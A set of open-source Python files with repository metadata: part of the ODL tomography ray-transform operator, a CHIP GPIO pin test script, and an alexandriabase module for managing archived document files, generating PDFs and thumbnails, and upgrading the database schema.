domain_uspace, geometry.partition, domain_dspace,
interp=domain_interp, order=discr_range.order,
axis_labels=axis_labels)
self.ray_trafo = None
super().__init__(discr_domain, discr_range, linear=True)
@property
def impl(self):
"""Implementation back-end for evaluation of this operator."""
return self.__impl
@property
def geometry(self):
"""Geometry of this operator."""
return self.__geometry
def _call(self, x, out=None):
"""Back-project ``x`` and store the result in ``out`` if given."""
if self.impl.startswith('astra'):
backend, data_impl = self.impl.split('_')
if data_impl == 'cpu':
return astra_cpu_back_projector(x, self.geometry,
self.range, out)
elif data_impl == 'cuda':
backproj = getattr(self, 'astra_backprojector', None)
if backproj is None:
self.astra_backprojector = AstraCudaBackProjectorImpl(
self.geometry, self.range, self.domain,
use_cache=self.use_cache)
return self.astra_backprojector.call_backward(x, out)
else:
# Should never happen
raise RuntimeError('implementation info is inconsistent')
elif self.impl == 'scikit':
return scikit_radon_back_projector(x, self.geometry,
self.range, out)
else: # Should never happen
raise RuntimeError('implementation info is inconsistent')
@property
def adjoint(self):
"""Adjoint of this operator.
Returns
-------
adjoint : `RayTransform`
"""
if self.ray_trafo is not None:
return self.ray_trafo
kwargs = self.kwargs.copy()
kwargs['discr_range'] = self.domain
self.ray_trafo = RayTransform(self.range, self.geometry,
impl=self.impl,
use_cache=self.use_cache,
**kwargs)
return self.ray_trafo
if __name__ == '__main__':
# pylint: disable=wrong-import-position
from odl.util.testutils import run_doctests
run_doctests()
|
bgris/ODL_bgris
|
lib/python3.5/site-packages/odl/tomo/operators/ray_trafo.py
|
Python
|
gpl-3.0
| 16,832
|
#!/usr/bin/python
import Adafruit_GPIO as GPIO
import time, os
#print "GETTING GPIO OBJECT"
gpio = GPIO.get_platform_gpio()
#print "SETUP CSID1"
#gpio.setup("CSID1", GPIO.OUT)
#print os.path.exists('/sys/class/gpio/gpio133')
#print "SETUP XIO-P1"
#gpio.setup("XIO-P1", GPIO.IN)
#GPIO.setup("U14_13", GPIO.IN)
#print "READING XIO-P1"
#print "HIGH", gpio.input("XIO-P1")
#gpio.output("CSID1", GPIO.LOW)
#time.sleep(1)
#print "LOW", gpio.input("XIO-P1")
#gpio.output("CSID1", GPIO.HIGH)
#print "HIGH", gpio.input("XIO-P1")
#gpio.output("CSID1", GPIO.LOW)
#print "LOW", gpio.input("XIO-P1")
#this example will test out CHIP XIO-P0 in to XIO-P1
#jumper the pins to test
#
#my test required sudo to work, gpio access requires sudo before changing permissions
#gpio.setup("XIO-P0", GPIO.OUT)
#gpio.setup("XIO-P1", GPIO.IN)
#print "LOW", gpio.input("XIO-P0")
#print "LOW", gpio.input("XIO-P1")
#gpio.output("XIO-P0", GPIO.HIGH)
#print "LOW", gpio.input("XIO-P0")
#print "LOW", gpio.input("XIO-P1")
#time.sleep(4)
#gpio.output("XIO-P0", GPIO.LOW)
#print "LOW", gpio.input("XIO-P0")
#print "LOW", gpio.input("XIO-P1")
#print "CLEANUP"
#gpio.cleanup()
gpio.setup("XIO-P0", GPIO.OUT)
gpio.output("XIO-P0", GPIO.LOW)
|
fantoms/psychic-octo-spork
|
chipenable.py
|
Python
|
gpl-3.0
| 1,216
|
'''
Created on 07.02.2018
@author: michael
'''
import codecs
import logging
import os
import re
import shutil
import struct
import sys
import tempfile
from _io import BytesIO
from math import ceil
from subprocess import call
from injector import inject, provider, ClassProvider, singleton, Module
from PIL import ImageFont, ImageDraw, Image
from PyPDF2.generic import DictionaryObject, readObject
from PyPDF2.merger import PdfFileMerger
from PyPDF2.pdf import ContentStream, PdfFileReader
from PyPDF2.utils import readNonWhitespace, b_, PdfReadError
from reportlab.platypus.paragraph import Paragraph
from reportlab.lib.styles import ParagraphStyle
from reportlab.platypus.doctemplate import SimpleDocTemplate
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import cm, inch
from reportlab.platypus.flowables import Image as PdfImage
from sqlalchemy.sql.expression import text, update, select
from alexandriabase import _, baseinjectorkeys, fontdir
from alexandriabase.base_exceptions import NoSuchEntityException
from alexandriabase.daos import CURRENT_VERSION, REGISTRY_TABLE, CreatorDao,\
DocumentFileInfoDao, DocumentDao, DocumentTypeDao, EventDao,\
EventCrossreferencesDao, EventTypeDao, DocumentEventRelationsDao
from alexandriabase.domain import PaginatedResult, Document, Tree, EventType,\
EventTypeIdentifier, Event
# Patching PyPDF2
# pylint: disable=wrong-import-order
# pylint: disable=ungrouped-imports
from PyPDF2 import utils
from sqlalchemy.engine.base import Engine
from alexandriabase.config import Config
def read_inline_image_patch(self, stream):
'''
Overrides the _readInlineImage method in the
ContentStream class to speed up data reading
'''
# begin reading just after the "BI" - begin image
# first read the dictionary of settings.
settings = DictionaryObject()
while True:
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
if tok == b_("I"):
# "ID" - begin of image data
break
key = readObject(stream, self.pdf)
tok = readNonWhitespace(stream)
stream.seek(-1, 1)
value = readObject(stream, self.pdf)
settings[key] = value
# left at beginning of ID
tmp = stream.read(3)
assert tmp[:2] == b_("ID")
# pylint: disable=protected-access
data = self._readImagaDataFast(stream)
return {"settings": settings, "data": data}
def read_imaga_data_fast(self, stream):
'''
Buffered reading of image data. The unpatched version
did read byte by byte which is incredible slow on large
images.
'''
# pylint: disable=unused-argument
# We keep more than buffersize bytes in the buffer because the
# end of image sequence might overlap. So we search some data twice,
# but this is still far more effective than the old algorithm
buffersize = 1024 * 1024 # Extracting in megabyte chunks
buffertail = 256
regex = re.compile(b_("(.*?)(EI\\s+)Q\\s+"), re.DOTALL)
data = b_("")
buffer = stream.read(buffersize+buffertail)
end_of_image = False
while not end_of_image:
match = regex.match(buffer)
if match:
data += buffer[:len(match.group(1))]
stream.seek(-1 * (len(buffer) - len(match.group(1)) - len(match.group(2))), 1)
end_of_image = True
else:
if len(buffer) < buffersize + buffertail: # We already have exhausted the stream
raise utils.PdfReadError("Didn't find end of image marker!")
data += buffer[:buffersize]
buffer = buffer[buffersize:] + stream.read(buffersize)
return data
#pylint: disable=protected-access
ContentStream._readInlineImage = read_inline_image_patch
ContentStream._readImageDataFast = read_imaga_data_fast
# End of patchinv PyPDF2
class UnsupportedFileFormat(Exception):
'''
Raised when the given file format is not
supported.
Argument:
format The offending format
'''
def __init__(self, file_format):
# pylint: disable=super-init-not-called
self.file_format = file_format
class UnsupportedFileResolution(Exception):
'''
Raised, when the fileformat is supported,
but not with this resolution.
'''
def __init__(self, file_format, resolution):
# pylint: disable=super-init-not-called
self.file_format = file_format
self.x_resolution = resolution
self.y_resolution = resolution
class DifferentXAndYResolutions(UnsupportedFileResolution):
'''
Raised, when the x resolutions does not match the
y resolution.
'''
def __init__(self, x_resolution, y_resolution):
# pylint: disable=super-init-not-called
self.file_format = None
self.x_resolution = x_resolution
self.y_resolution = y_resolution
def get_graphic_file_resolution(file):
'''
Gets the resolution from the info property of a PIL image
'''
image = Image.open(file)
file_info = image.info
if not 'dpi' in file_info:
return None
x_res = file_info['dpi'][0]
y_res = file_info['dpi'][1]
# In newer versions of Pillow the resolution
# is an object of type IFDRational that is
# not simply comparable - equality checks for identity
if "%s" % x_res != "%s" % y_res:
raise DifferentXAndYResolutions(x_res, y_res)
return x_res
def get_gif_file_resolution(file):
# pylint: disable=unused-argument
'''
Gifs always have a resolution of 72 dpi. In the early days of
the first alexandria implementation we scanned with 300 dpi
and converted it straight to a gif file. So in fact our gifs
have 300 dpi
'''
return 300
class BaseRecordService():
'''
classdocs
'''
def __init__(self, dao, filter_expression_builder):
'''
The constructor expects the dao for the record type
as parameter and a dao specific filter expression builder.
'''
self.dao = dao
self.filter_expression_builder = filter_expression_builder
def get_by_id(self, object_id):
'''
Just reaches through to the dao.
'''
return self.dao.get_by_id(object_id)
def get_first(self, filter_expression):
'''
Just reaches through to the dao.
'''
return self.dao.get_first(filter_expression)
def get_next(self, entity, filter_expression):
'''
Just reaches through to the dao.
'''
return self.dao.get_next(entity, filter_expression)
def get_previous(self, entity, filter_expression):
'''
Just reaches through to the dao.
'''
return self.dao.get_previous(entity, filter_expression)
def get_last(self, filter_expression):
'''
Just reaches through to the dao.
'''
return self.dao.get_last(filter_expression)
def get_nearest(self, entity_id, filter_expression):
'''
Just reaches through to the dao.
'''
return self.dao.get_nearest(entity_id, filter_expression)
def create_filter_expression(self, filter_object):
'''
Uses a dao specific filter object to build a filter expression
'''
return self.filter_expression_builder.create_filter_expression(filter_object)
def save(self, entity):
'''
Just reaches through to the dao.
'''
return self.dao.save(entity)
def delete(self, entity):
'''
Just reaches through to the dao.
'''
self.dao.delete(entity.id)
def find(self, condition, page, page_size):
'''
Finds documents and wraps them with a PaginatedResult
'''
result = PaginatedResult()
result.page = page
result.page_size = page_size
number_of_entities = self.dao.get_count(condition)
result.number_of_pages = ceil((number_of_entities * 1.0) / page_size)
result.entities = self.dao.find(condition, page, page_size)
return result
@singleton
class CreatorService(object):
'''
Service to manage the creators in the database.
'''
@inject
def __init__(self, creator_dao: CreatorDao):
'''
Uses the creator dao for database access
'''
self.creator_dao = creator_dao
def find_all_active_creators(self):
'''
Returns all creators that have the visible flag set.
'''
return self.creator_dao.find_all_visible()
def get_version(connection):
'''
TODO: Use registry dao
Reads the current database version from the registry table
'''
query = select([REGISTRY_TABLE])\
.where(REGISTRY_TABLE.c.schluessel == 'version') # @UndefinedVariable
result = connection.execute(query)
row = result.fetchone()
return row[REGISTRY_TABLE.c.wert] # @UndefinedVariable
class BaseUpdate():
'''
Baseclass for update classes that provider the set_version method
'''
def __init__(self, connection, dialect):
self.connection = connection
self.dialect = dialect
def set_version(self, version):
'''
Updates the registry table to set the current version
'''
query = update(REGISTRY_TABLE)\
.values(wert=version)\
.where(REGISTRY_TABLE.c.schluessel == 'version') # @UndefinedVariable
self.connection.execute(query)
class UpdateFrom0_3(BaseUpdate):
# pylint: disable=invalid-name
'''
Updates from version 0.3 to 0.4 (removes annoying not null constraints)
'''
dialect_specifics = {'sqlite': '',
'postgresql': 'alter table dokument alter seite drop not null, ' +
'alter dateityp drop not null'}
def run(self):
'''
Runs the upgrade
'''
self.connection.execute(text(self.dialect_specifics[self.dialect]))
self.set_version('0.4')
@singleton
class DatabaseUpgradeService():
'''
Handles updating the database
'''
@inject
def __init__(self, db_engine: Engine):
'''
Constructor
'''
self.db_engine = db_engine
def is_update_necessary(self):
'''
Informs about necessity for an upgrade
'''
connection = self.db_engine.connect()
db_version = get_version(connection)
connection.close()
return db_version != CURRENT_VERSION
def run_update(self):
'''
Runs all unapplied upgrades in a transaction. Rolls back,
if something goes wrong and throws received exception again.
'''
connection = self.db_engine.connect()
transaction = connection.begin()
try:
db_version = get_version(connection)
while db_version != CURRENT_VERSION:
class_name = 'UpdateFrom' + db_version.replace('.', '_')
updater_class = getattr(sys.modules[self.__module__], class_name)
updater = updater_class(connection, self.db_engine.name)
updater.run()
db_version = get_version(connection)
except Exception as exception:
transaction.rollback()
raise exception
transaction.commit()
connection.close()
LINES_ARE_PARAGRAPHS = 'Lines are paragraphs'
EMPTY_LINES_ARE_SEPARATORS = 'Empty lines are separators'
SHORT_LINES_ARE_PARBREAKS = 'Short lines are paragraph breaks'
class TextObject(object):
'''
Abstract representation of a text file to extract paragraphs
for pdf generation.
'''
_re_empty_line = re.compile(r"^\s+$")
def __init__(self, file_name):
file = self._open_file(file_name)
self.lines = []
self.number_of_lines = 0
self.empty_lines = 0
self.max_length = 0
for line in file:
self._add_line(line)
file.close()
def _open_file(self, file_name):
'''
Determines if we have an old latin1 file or a new unicode file
'''
# pylint: disable=no-self-use
try:
file = open(file_name, 'r')
file.read()
except UnicodeDecodeError:
file.close()
return codecs.open(file_name, 'r', 'latin1')
file.close()
return open(file_name, 'r')
def _add_line(self, line):
self.lines.append(line)
self.number_of_lines += 1
if self._is_line_empty(line):
self.empty_lines += 1
return
if len(line) > self.max_length:
self.max_length = len(line)
def _is_line_empty(self, line):
return self._re_empty_line.match(line)
def _get_short_line_length(self):
return self.max_length * 0.8
def get_paragraphs(self):
'''
Tries to split the text file into paragraphs according
to some file characteristics. May not be one hundret percent
accurate.
'''
if self.max_length > 120:
return self._use_lines_as_paragraphs()
if self.empty_lines > 2:
return self._use_empty_lines_as_separators()
return self._use_short_lines_as_separators()
def _use_lines_as_paragraphs(self):
paragraphs = []
counter = 0
for line in self.lines:
if not self._is_line_empty(line):
paragraphs.append(line)
counter += 1
return paragraphs
def _use_empty_lines_as_separators(self):
paragraphs = []
lines = []
counter = 0
for line in self.lines:
if self._is_line_empty(line):
paragraphs.append("".join(lines))
counter += 1
lines = []
else:
lines.append(line)
paragraphs.append("".join(lines))
return paragraphs
def _use_short_lines_as_separators(self):
short = self._get_short_line_length()
paragraphs = []
lines = []
counter = 0
for line in self.lines:
lines.append(line)
if len(line) < short:
paragraphs.append("".join(lines))
lines = []
counter += 1
paragraphs.append("".join(lines))
return paragraphs
@singleton
class DocumentFileManager(object):
'''
A simple class to manage document files. It provider
all the methods needed to create, delete or find files
referenced by a document file info.
It also supports handling of derived files (pdfs, thumbnails etc.)
'''
# pylint: disable=no-self-use
@inject
def __init__(self, config_service: Config,
document_file_info_dao: DocumentFileInfoDao):
'''
Constructor reads the configuration from the config_service
'''
self.base_dir = config_service.document_dir
self.archives = config_service.archive_dirs
self.document_file_info_dao = document_file_info_dao
self.path_handler = {THUMBNAIL: self._get_thumb_path,
DISPLAY_IMAGE: self._get_display_path,
DOCUMENT_PDF: self._get_pdf_path}
self.logger = logging.getLogger(
"alexandriabase.services.documentfilemanager.DocumentFileManager")
def delete_file(self, document_file_info):
'''
Does not physically delete files but appends their file name
with .deleted
'''
file_path = self.get_file_path(document_file_info)
shutil.move(file_path, "%s.deleted" % file_path)
def add_file(self, file_path, document_file_info):
'''
Adds a file to the DOCUMENTBASEDIR, renaming it according
to the information in the document file info and deletes
the original file
'''
directory_path = self._create_type_dir_path(document_file_info)
if not os.path.exists(directory_path):
os.makedirs(directory_path)
shutil.copy(file_path, os.path.join(directory_path, document_file_info.get_file_name()))
os.remove(file_path)
def get_file_path(self, document_file_info):
'''
Searches in the BASEDIR and then in the ARCHIVES for the
referenced file. Raises a DocumentFileNotFound exception
if not found.
'''
self.logger.debug("Searching for file %s", document_file_info)
basedir_path = self._create_basedir_path(document_file_info)
self.logger.debug("Searching in %s", basedir_path)
if os.path.isfile(basedir_path):
return basedir_path
expanded_short_path = self._create_archive_sub_path(document_file_info)
for archive in self.archives:
archive_path = os.path.join(archive, expanded_short_path)
self.logger.debug("Searching in %s", archive_path)
if os.path.isfile(archive_path):
return archive_path
raise DocumentFileNotFound(document_file_info)
def get_generated_file_path(self, document_file_info, generation_type):
'''
Returns the path of the generated file belonging to the master
file given in the document_file_info of the given generation_type
'''
return self.path_handler[generation_type](document_file_info)
def _get_thumb_path(self, document_file_info):
'''
Returns the location of the thumbnail path
'''
return self._get_path(document_file_info, "thumb", "png")
def _get_display_path(self, document_file_info):
'''
Returns the location of the display image path
'''
return self._get_path(document_file_info, "display", "png")
def _get_pdf_path(self, document_file_info):
'''
Returns the location of the pdf file path
'''
if document_file_info.id == document_file_info.document_id:
file_info = document_file_info
else:
file_info = self.document_file_info_dao.get_by_id(document_file_info.document_id)
return self._get_path(file_info, "pdf", "pdf")
def _get_path(self, document_file_info, subdir, extension):
'''
Use regular expressions to manipulate the master file
path for derived files
'''
file_path = self.get_file_path(document_file_info)
ftype = document_file_info.filetype
subdir_path = re.sub(r"/%s/(?=\d{8}\.%s)" % (ftype, ftype),
r"/%s/%s/" % (ftype, subdir),
file_path)
return re.sub(r"\.%s$" % ftype, ".%s" % extension, subdir_path)
def get_generated_file(self, document_file_info, generation_type):
'''
Returns the file as bytes if it exists. May throw a FileNotFound exception.
'''
path = self.get_generated_file_path(document_file_info, generation_type)
file = open(path, mode="rb")
content = file.read()
file.close()
return content
def add_generated_file(self, byte_buffer, document_file_info, generation_type):
'''
Add the generated file at its appropriate place.
'''
path = self.get_generated_file_path(document_file_info, generation_type)
path_dir = os.path.dirname(path)
try:
os.makedirs(path_dir)
except FileExistsError:
pass
file = open(path, mode="wb")
file.write(byte_buffer)
file.close()
def delete_generated_file(self, document_file_info, generation_type):
'''
Removes the generated file if it exists. Otherwise does nothing.
Also nothing happens when the original document just has is a single
pdf file and there is a request to delete the generated pdf file for
the document.
'''
try:
os.unlink(self.get_generated_file_path(document_file_info, generation_type))
except FileNotFoundError:
pass
def _create_basedir_path(self, document_file_info):
'''
Creates a path for the file in the base dir
'''
return os.path.join(self.base_dir,
self._create_path_with_typedir(document_file_info))
def _create_type_dir_path(self, document_file_info):
return os.path.join(self.base_dir,
document_file_info.filetype)
def _create_path_with_typedir(self, document_file_info):
'''
Helper function for path construction
'''
return os.path.join(
document_file_info.filetype,
document_file_info.get_file_name())
def _create_archive_sub_path(self, document_file_info):
'''
When documents are archived, then they are stored in 1000 blocks.
The first 1000 files (0-999) go into the directory 1000, then next
1000 files (1000-1999) into the directory 2000 and so on.
'''
dirnumber = ((document_file_info.id + 1000) // 1000) * 1000
return os.path.join("%d" % dirnumber,
self._create_path_with_typedir(document_file_info))
@singleton
class TextPdfHandler(object):
'''
Handler class for text files. Converts text into paragraph
flowables.
'''
_re_empty_line = re.compile(r"^\s+$")
@inject
def __init__(self, document_file_manager: DocumentFileManager):
'''
Constructor
'''
self.first_paragraph = ParagraphStyle('First',
fontName='Helvetica-Bold',
fontSize=18,
leading=20,
spaceBefore=10,
spaceAfter=10,
leftIndent=2 * cm,
rightIndent=2 * cm)
self.second_paragraph = ParagraphStyle('Second',
fontName='Helvetica-Bold',
fontSize=16,
leading=18,
spaceBefore=10,
spaceAfter=10,
leftIndent=2 * cm,
rightIndent=2 * cm)
self.normal_style = ParagraphStyle('Normal',
fontName='Helvetica',
fontSize=12,
leading=16,
spaceBefore=10,
spaceAfter=10,
leftIndent=2 * cm,
rightIndent=2 * cm)
self.document_file_manager = document_file_manager
self.styles = [self.first_paragraph, self.second_paragraph]
def add_document_file_to_story(self, story, file_info, margins):
'''
The handler method. Adds the flowables to the story. The margins
parameter is not used in this handler because the paragraphs get
automatically alligned to the margins of the containing frame.
'''
# pylint: disable=unused-argument
file_name = self.document_file_manager.get_file_path(file_info)
text_object = TextObject(file_name)
paragraphs = text_object.get_paragraphs()
for par in paragraphs[0:1]:
story.append(Paragraph(par, self.first_paragraph))
for par in paragraphs[1:2]:
story.append(Paragraph(par, self.second_paragraph))
for par in paragraphs[2:]:
story.append(Paragraph(par, self.normal_style))
return story
@singleton
class GraphicsPdfHandler(object):
'''
Handler for graphic formats.
'''
@inject
def __init__(self, document_file_manager: DocumentFileManager):
'''
Constructor
'''
self.document_file_manager = document_file_manager
self.frame_width = 583
self.frame_height = 829
def add_document_file_to_story(self, story, file_info, margins):
'''
The handler method. Scales the images either to fit on a page (if
they are larger) or to the proper size according to the given
file resolution.
'''
file = self.document_file_manager.get_file_path(file_info)
available_width = self.frame_width - margins * 2 * cm
available_height = self.frame_height - margins * 2 * cm
image = PdfImage(file)
if image.imageWidth > available_width or image.imageHeight > available_height:
# scale down to
factor = available_width / image.imageWidth
height_factor = available_height / image.imageHeight
if height_factor < factor:
factor = height_factor
story.append(PdfImage(file, image.imageWidth*factor, image.imageHeight*factor))
else:
# calculate size
resolution = file_info.resolution
if not resolution:
resolution = 300.0
width_in_inch = image.imageWidth / resolution
height_in_inch = image.imageHeight / resolution
story.append(PdfImage(file, width_in_inch * inch, height_in_inch * inch))
return story
@singleton
class DocumentPdfGenerationService(object):
'''
Service to create a pdf file from the systematic database
entries
'''
# pylint: disable=no-self-use
@inject
def __init__(self,
document_file_info_dao: DocumentFileInfoDao,
document_file_manager: DocumentFileManager,
pdf_handlers: baseinjectorkeys.PDF_HANDLERS_KEY):
'''
Constructor
'''
self.document_file_info_dao = document_file_info_dao
self.document_file_manager = document_file_manager
self.pdf_handlers = pdf_handlers
def generate_document_pdf(self, document):
'''
The public method to create a pdf file for a document
Returns the pdf as byte buffer
'''
file_infos = self.document_file_info_dao.get_file_infos_for_document(document.id)
return self._run_generation(file_infos)
def generate_file_pdf(self, document_file_info):
'''
The public method to create a pdf file for just one document file
Returns the pdf as byte buffer
'''
return self._run_generation([document_file_info])
def _run_generation(self, file_infos):
if self._contains_text_content(file_infos):
margins = 1.5
else:
margins = 0.0
pdf_list = []
story = []
for file_info in file_infos:
if file_info.filetype == 'pdf':
if story:
pdf_list.append(self._build_pdf(story, margins))
story = []
path = self.document_file_manager.get_file_path(file_info)
file = open(path, "rb")
pdf_list.append(file.read())
file.close()
continue
if file_info.filetype in self.pdf_handlers.keys():
story = self.pdf_handlers[file_info.filetype].\
add_document_file_to_story(story, file_info, margins)
else:
story = self._add_no_handler_warning(story, file_info)
if story:
pdf_list.append(self._build_pdf(story, margins))
return self._join_pdfs(pdf_list)
def _build_pdf(self, story, margins):
file = BytesIO()
doc = SimpleDocTemplate(file,
pagesize=A4,
leftMargin=margins * cm,
rightMargin=margins * cm,
topMargin=margins * cm,
bottomMargin=margins * cm)
doc.build(story)
return file.getvalue()
def _join_pdfs(self, pdf_list):
if len(pdf_list) == 1:
return pdf_list[0]
pdf_merger = PdfFileMerger()
for pdf in pdf_list:
pdf_file = BytesIO(pdf)
pdf_merger.append(pdf_file)
output = BytesIO()
pdf_merger.write(output)
pdf_merger.close()
return output.getvalue()
def _contains_text_content(self, file_infos):
for file_info in file_infos:
if file_info.filetype == 'txt':
return True
return False
def _add_no_handler_warning(self, story, file_info):
style = ParagraphStyle('Normal', None)
style.fontSize = 18
style.leading = 20
style.spaceBefore = 12
style.spaceAfter = 12
paragraph = Paragraph("It is not possible to represent document file %s as pdf."
% file_info, style)
story.append(paragraph)
return story
THUMBNAIL = 'thumbnail'
DISPLAY_IMAGE = 'display_image'
DOCUMENT_PDF = 'document_pdf'
class DocumentFileNotFound(Exception):
'''
Exception class for not found files
'''
# pylint: disable=super-init-not-called
def __init__(self, document_file_info):
self.document_file_info = document_file_info
class NoImageGeneratorError(Exception):
'''
Exception class for not found files
'''
# pylint: disable=super-init-not-called
def __init__(self, filetype):
self.filetype = filetype
class ImageExtractionFailure(Exception):
'''
Exception class for failed image extraction
'''
# pylint: disable=super-init-not-called
def __init__(self, file_path, return_value):
self.file_path = file_path
self.return_value = return_value
@singleton
class DocumentFileImageGenerator:
'''
Main class for image generation. There are handlers for different
file types to create an image (there should be more). Throws a
NoImageGeneratorError if it is no possible to create an image from
a file.
'''
@inject
def __init__(self, image_generators: baseinjectorkeys.IMAGE_GENERATORS_KEY):
self.image_generators = image_generators
def generate_image(self, document_file_info):
'''
Invokes the appropriate handler for the file type to generate an image
'''
try:
return self.image_generators[document_file_info.filetype].\
generate_image(document_file_info)
except KeyError:
raise NoImageGeneratorError(document_file_info.filetype)
@singleton
class FileProvider():
'''
Provides the content of different derived files for documents. The
files will generated, if they do not already exist. This should
be relatively fail safe, provided that the original files exist.
'''
# pylint: disable=no-self-use
@inject
def __init__(self,
document_file_manager: DocumentFileManager,
document_file_info_dao: DocumentFileInfoDao,
document_pdf_generator: DocumentPdfGenerationService,
document_file_image_generator: DocumentFileImageGenerator):
self.document_file_manager = document_file_manager
self.document_file_info_dao = document_file_info_dao
self.document_pdf_generator = document_pdf_generator
self.document_file_image_generator = document_file_image_generator
def get_pdf(self, document):
'''
Returns (and creates if necessary) the pdf file for a document.
TODO: Bug if there is no file attached yet to the document
'''
try:
document_file_info = self.document_file_info_dao.get_by_id(document.id)
except NoSuchEntityException:
# Quick fix, reconsider
raise DocumentFileNotFound(None)
try:
return self.document_file_manager.get_generated_file(document_file_info, DOCUMENT_PDF)
except FileNotFoundError:
pass
# if we get here, we have to generate the pdf
pdf = self.document_pdf_generator.generate_document_pdf(document)
self.document_file_manager.add_generated_file(pdf, document_file_info, DOCUMENT_PDF)
return pdf
def get_thumbnail(self, document_file_info):
'''
Returns (and creates if necessary) the thumbnail file for a document file
'''
try:
return self.document_file_manager.get_generated_file(document_file_info, THUMBNAIL)
except FileNotFoundError:
pass
try:
pil_img = self.document_file_image_generator.generate_image(document_file_info)
except NoImageGeneratorError:
pil_img = self._create_no_thumbnail_image(document_file_info)
pil_img.thumbnail((200, 258))
if pil_img.mode == "CMYK":
pil_img = pil_img.convert("RGB")
file_buffer = BytesIO()
try:
pil_img.save(file_buffer, 'png')
except IOError as error:
print("Error saving file %s" % document_file_info)
raise error
thumbnail = file_buffer.getvalue()
self.document_file_manager.add_generated_file(thumbnail, document_file_info, THUMBNAIL)
return thumbnail
def get_display_image(self, document_file_info):
'''
Returns (and creates if necessary) a display image file for a document file
'''
try:
return self.document_file_manager.get_generated_file(document_file_info, DISPLAY_IMAGE)
except FileNotFoundError:
pass
try:
pil_img = self.document_file_image_generator.generate_image(document_file_info)
except NoImageGeneratorError:
pil_img = self._create_no_display_image(document_file_info)
resolution = document_file_info.resolution
if resolution is None:
resolution = 72
scaling_factor = 108.0 / resolution
scaled_width = int(pil_img.size[0] * scaling_factor)
scaled_height = int(pil_img.size[1] * scaling_factor)
pil_img = pil_img.resize((scaled_width, scaled_height))
if pil_img.mode == "CMYK":
pil_img = pil_img.convert("RGB")
file_buffer = BytesIO()
pil_img.save(file_buffer, 'png')
display_image = file_buffer.getvalue()
self.document_file_manager.add_generated_file(display_image,
document_file_info,
DISPLAY_IMAGE)
return display_image
def _create_no_thumbnail_image(self, document_file_info):
img = Image.new('P', (400, 440), color=255)
font = ImageFont.truetype(os.path.join(fontdir, "Arial_Bold.ttf"), 48)
draw = ImageDraw.Draw(img)
draw.text((10, 60), "Keine Vorschau", font=font, fill=0)
draw.text((10, 120), "für Datei", font=font, fill=0)
draw.text((10, 180), document_file_info.get_file_name(), font=font, fill=0)
return img
def _create_no_display_image(self, document_file_info):
img = Image.new('P', (400, 440), color=255)
font = ImageFont.truetype(os.path.join(fontdir, "Arial_Bold.ttf"), 48)
draw = ImageDraw.Draw(img)
draw.text((10, 60), "Keine Graphik", font=font, fill=0)
draw.text((10, 120), "für Datei", font=font, fill=0)
draw.text((10, 180), document_file_info.get_file_name(), font=font, fill=0)
return img
class GraphicsImageGenerator:
'''
A simple image "generator" for graphics file: Just opens the graphic
file as PIL image
'''
@inject
def __init__(self, document_file_manager: DocumentFileManager):
self.document_file_manager = document_file_manager
def generate_image(self, document_file_info):
'''
Opens the file as PIL image
'''
return Image.open(self.document_file_manager.get_file_path(document_file_info))
@singleton
class PdfImageExtractor(object):
'''
Creates PIL images from pdf files. First tries to extract
image data directly from the pdf file, then, when this fails,
uses ghostscript to render the first page of the pdf.
The code is mostly based on information found at
http://stackoverflow.com/questions/2693820/extract-images-from-pdf-without-resampling-in-python
There is a lot of exception caching and handling in this class
because there are pdfs out in the wild you would not believe could
exist. This class consistently throws an ImageExtractionFailure
when something goes fatally wrong. But be aware it might return a
blank image without notifying you of any failure anything. Or the
image might fail when working on it.
'''
# pylint: disable=no-self-use
def __init__(self):
self.data_extractors = {'/FlateDecode': self._decode_data,
'/DCTDecode': self._extract_jpg_data,
'/JPXDecode': self._extract_jpg_data,
'/CCITTFaxDecode': self._extract_ccitt_fax}
self.logger = logging.getLogger()
def extract_image(self, path):
'''
The public method to extract an image from a pdf file
This is much too sophisticated since in 99.9% of the cases
we need ghostscript to extract the image file, either because
there is text on the page or there are multiple images. Or
there are errors only ghostscript is able to handle.
But since the code is written, we use it.
'''
# pylint: disable=broad-except
# pylint: disable=too-many-return-statements
try:
pdf_reader = PdfFileReader(open(path, "rb"))
except Exception as error:
self.logger.debug("Trying ghostscript due to pyPDF2 read failure (%s).", error)
return self._extract_using_ghostscript(path)
if pdf_reader.isEncrypted:
self.logger.debug("Trying ghostscript on encrypted pdf.")
return self._extract_using_ghostscript(path)
try:
page0 = pdf_reader.getPage(0)
except Exception as error:
self.logger.debug("Trying ghostscript due to page read failure (%s).", error)
return self._extract_using_ghostscript(path)
try:
page_text = page0.extractText()
except Exception as error:
self.logger.debug("Trying ghostscript due " +
"to error extracting text from pdf (%s).", error)
return self._extract_using_ghostscript(path)
if page_text != '':
return self._extract_using_ghostscript(path)
image_objects = self._find_image_objects(page0)
if len(image_objects) != 1:
# If we have zero images, we need to use ghostscript
# If there are several images, it is too complicated to join them
self.logger.debug("Using ghostscript (number of extractable " +
"images is %d).", len(image_objects))
return self._extract_using_ghostscript(path)
image_object = image_objects[0]
try:
filter_type = image_object["/Filter"]
if not isinstance(filter_type, list):
filter_type = (filter_type,)
for handler_key in self.data_extractors:
if handler_key in filter_type:
self.logger.debug("Extracting for filter type %s", filter_type)
return self.data_extractors[handler_key](image_object)
except Exception as error:
if self.logger.getEffectiveLevel() == logging.DEBUG:
self.logger.exception("Exception running extractor (%s).", error)
# if we did not succeed for whatever reason, we fall back
# to interpreting the pdf file using ghostscript
self.logger.debug("Using ghostscript due to exception.")
return self._extract_using_ghostscript(path)
def _extract_using_ghostscript(self, pdf_path):
'''
We can't successfully extract an wrapped image, so we have to render the pdf ourselves.
'''
tmp_file = tempfile.NamedTemporaryFile("wb")
path = tmp_file.name
tmp_file.close()
stdio = open(os.devnull, 'wb')
return_value = call(["gs",
"-sDEVICE=png16m",
"-dNOPAUSE", "-dFirstPage=1",
"-dLastPage=1",
"-sOutputFile=%s" % path,
"-r300",
"-q",
pdf_path,
"-c",
"quit"],
stdout=stdio,
stderr=stdio)
if return_value != 0:
# pylint: disable=bare-except
try:
os.unlink(path)
except:
pass
raise ImageExtractionFailure(path, return_value)
img = Image.open(path)
os.unlink(path)
return img
def _generate_tiff_header_for_ccitt_fax(self, width, height, data_size, compression):
'''
Auxiliary method to create a tiff header from meta data information
'''
tiff_header_struct = '<' + '2s' + 'h' + 'l' + 'h' + 'hhll' * 8 + 'l'
return struct.pack(tiff_header_struct,
# Byte order indication: Little indian
b'II',
# Version number (always 42)
42,
# Offset to first IFD
8,
# Number of tags in IFD
8,
